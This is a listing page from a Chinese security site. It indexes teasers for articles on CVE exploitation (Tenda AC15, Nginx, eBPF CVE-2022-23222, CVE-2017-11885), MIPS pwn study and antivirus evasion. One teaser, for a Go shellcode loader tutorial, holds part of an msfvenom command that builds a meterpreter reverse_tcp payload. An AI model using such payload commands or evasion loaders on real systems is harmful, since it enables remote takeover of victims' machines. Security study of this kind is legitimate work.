pointer - 第 3 | CN-SEC 中文网

安全文章

Break frida-objc-bridge

前言回顾上上上…篇发布的文章《打造macOS下”最强”的微信取证工具》中使用 frida 工具从内存中获取到了关键数据，frida objc 的能力都来自于 frida-objc-bridge ，本...

04月29日26 views评论

阅读全文

IoT工控物联网

cve-2018-5767 Tenda AC15 栈溢出漏洞调试

漏洞分析官网上即可获取下载含漏洞版本固件V15.03.1.16，使用binwalk解压，可在目录bin目录下找到httpd程序，使用IDA打开httpd程序。根据在IDA中看到的websUrlHa...

04月24日42 views评论

阅读全文

程序逆向

远控免杀专题(76)-基于Go的各种API免杀测试

免杀专题文章及工具：https://github.com/TideSec/BypassAntiVirus免杀专题在线文库：http://wiki.tidesec.com/docs/bypassav本文...

03月08日36 views评论

阅读全文

安全漏洞

CVE-2021-23017 Nginx DNS解析程序漏洞

点击上方“蓝字”，关注更多精彩0x00 漏洞概述 2021年5月26日，Nginx官方发布安全公告，修复了nginx解析器中的一个DNS解析程序漏洞（CVE-2021-23017），由于ngx_res...

07月25日4,052 views评论

阅读全文

CVE-2022-23222漏洞及利用分析

0x00 背景 2022年1月14日，一个编号为CVE-2022-23222的漏洞被公开，这是一个位于eBPF验证器中的漏洞，漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算，通过精心构造的代...

07月06日安全文章41 views评论

阅读全文

CVE-2022-23222漏洞及利用分析

点击蓝字 / 关注我们0x00 背景2022年1月14日，一个编号为CVE-2022-23222的漏洞被公开，这是一个位于eBPF验证器中的漏洞，漏洞允许eBPF程序在未经验证的情...

06月28日安全文章47 views评论

阅读全文

CVE-2022-23222漏洞及利用分析

06月24日安全文章321 views评论

阅读全文

安全漏洞

CVE-2022-23222：Linux 内核 eBPF 本地权限提升

https://github.com/tr3ee/CVE-2022-23222 近期在对Linux eBPF进行代码审计的过程中，发现了一枚权限提升漏洞C...

06月14日79 views评论

阅读全文

安全开发

c/c++ 内存管理

这是我刚开始学编程里整理的一篇总结，主要是来源一本叫《高质量c/c++编程》的书，很多年过去了，重新复习一下。1、malloc()malloc()函数用来分配内存：将总共需要的字节数作为参数传递给该函...

05月28日50 views评论

阅读全文

CTF专场

异构框架之mips框架的pwn学习笔记

异构框架之mips框架的pwn学习笔记基础知识mips、mipsel的区别mips是大端(big-endian)架构，而mipsel是小端(little-endian)架构。指令的用法是差不多的。Pw...

05月17日619 views评论

阅读全文

CVE-2017-11885 EXP

#!/usr/bin/env python # -*- coding: utf-8 -*- #Tested in Windows Server 2003 SP2 (ES) - Only works w...

04月23日安全文章36 views评论

阅读全文

安全文章

Go编写loader加载shellcode免杀学习

一简单实现（1）msf生成shellcode，选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168...

04月11日154 views评论

阅读全文

在线咨询

微信